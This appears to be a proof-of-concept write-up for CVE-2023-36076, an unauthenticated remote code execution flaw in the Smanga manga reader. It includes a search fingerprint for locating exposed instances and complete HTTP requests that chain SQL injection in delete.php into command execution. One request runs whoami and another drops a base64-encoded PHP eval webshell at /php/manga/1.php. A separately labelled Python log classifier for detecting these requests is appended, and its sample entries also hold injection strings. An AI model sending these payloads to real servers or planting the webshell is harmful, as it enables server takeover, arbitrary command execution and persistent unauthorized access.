POC/wpoc/smanga/Smanga未授权远程代码执行漏洞(CVE-2023-36076).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00


Smanga Unauthenticated Remote Code Execution Vulnerability (CVE-2023-36076)

1. Vulnerability overview

Smanga is a manga streaming reader that installs directly without any Docker configuration; inspired by Emby and Plex, it was built to cover manga reading needs. The /php/manga/delete.php endpoint contains an unauthenticated remote code execution vulnerability: an attacker can execute arbitrary commands on the target host and take control of the server.

2. Affected versions

  • Smanga

3. Asset fingerprinting

  • hunter: web.title=="smanga"
  • Fingerprint


4. Vulnerability reproduction

POST /php/manga/delete.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360

mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo `whoami` > 1.txt;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true


Retrieve the command execution output

GET /php/manga/1.txt HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0


Write a webshell

POST /php/manga/delete.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360

mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo PD9waHAgY2xhc3MgR3c2UVBoNjYgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg4OTBhKXsgQGV2YWwoIi8qWjlZczlnSVY3MyovIi4kSDg5MGEuIi8qWjlZczlnSVY3MyovIik7IH19bmV3IEd3NlFQaDY2KCRfUkVRVUVTVFsneCddKTs/Pg== | base64 -d > 1.php;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true

Webshell path

/php/manga/1.php

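As an added defensive example (not part of this write-up or of the Smanga project), the following Python classifies requests to the vulnerable endpoint by whether `mangaId` is a plain numeric id, a UNION-based SQL injection probe, or an injection carrying shell metacharacters inside a quoted SQL literal, which is the shape of the RCE chain shown above. The tab-separated request log format, the helper names and the sample entries are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

VULN_PATH = "/php/manga/delete.php"
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
# Shell metacharacters inside a quoted SQL literal: the chain on this page only
# works if an injected column value reaches a shell, so this separates SQLi probes
# from RCE attempts.
SHELL_META_RE = re.compile(r"[`;|&]|\$\(|>")
SQL_LITERAL_RE = re.compile(r"'((?:[^'\\]|\\.)*)'")


def parse_form(body: str) -> dict:
    """Minimal application/x-www-form-urlencoded parser (splits on & only)."""
    params = {}
    for pair in body.split("&"):
        if pair:
            key, _, val = pair.partition("=")
            params.setdefault(unquote_plus(key), []).append(unquote_plus(val))
    return params


def classify_request(method: str, path: str, body: str) -> str:
    """Return 'ok', 'sqli' or 'rce' for a single request."""
    if method.upper() != "POST" or path.split("?", 1)[0] != VULN_PATH:
        return "ok"
    for value in parse_form(body).get("mangaId", []):
        if value.strip().isdigit():
            continue  # the only legitimate shape is a numeric id
        # Any non-numeric id is tampering; a UNION whose string literal carries
        # shell metacharacters is the command-injection chain described above.
        literals = SQL_LITERAL_RE.findall(value)
        if UNION_RE.search(value) and any(SHELL_META_RE.search(s) for s in literals):
            return "rce"
        return "sqli"
    return "ok"


# Constructed sample log: METHOD <tab> PATH <tab> BODY (not real traffic).
SAMPLE_LOG = [
    "POST\t/php/manga/delete.php\tmangaId=7&deleteFile=true",
    "POST\t/php/manga/delete.php\tmangaId=1+union+select+1,2,3&deleteFile=false",
    "POST\t/php/manga/delete.php\tmangaId=1+union+select+*+from+(select+1)a"
    "+join+(select+'\\\";echo+x;\\\"')b;&deleteFile=true",
    "GET\t/php/manga/1.txt\t",
]


def scan_log(lines) -> dict:
    """Count requests per class; anything other than 'ok' warrants review."""
    counts = {"ok": 0, "sqli": 0, "rce": 0}
    for line in lines:
        method, path, body = line.split("\t", 2)
        counts[classify_request(method, path, body)] += 1
    return counts
```

A follow-up indicator worth correlating with an `rce` hit is a later GET for a new file under /php/manga/, as in the retrieval step above.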

Updated: 2024-02-29 23:55:42
Source: https://www.yuque.com/xiaokp7/ocvun2/fgwxzim62xadgc33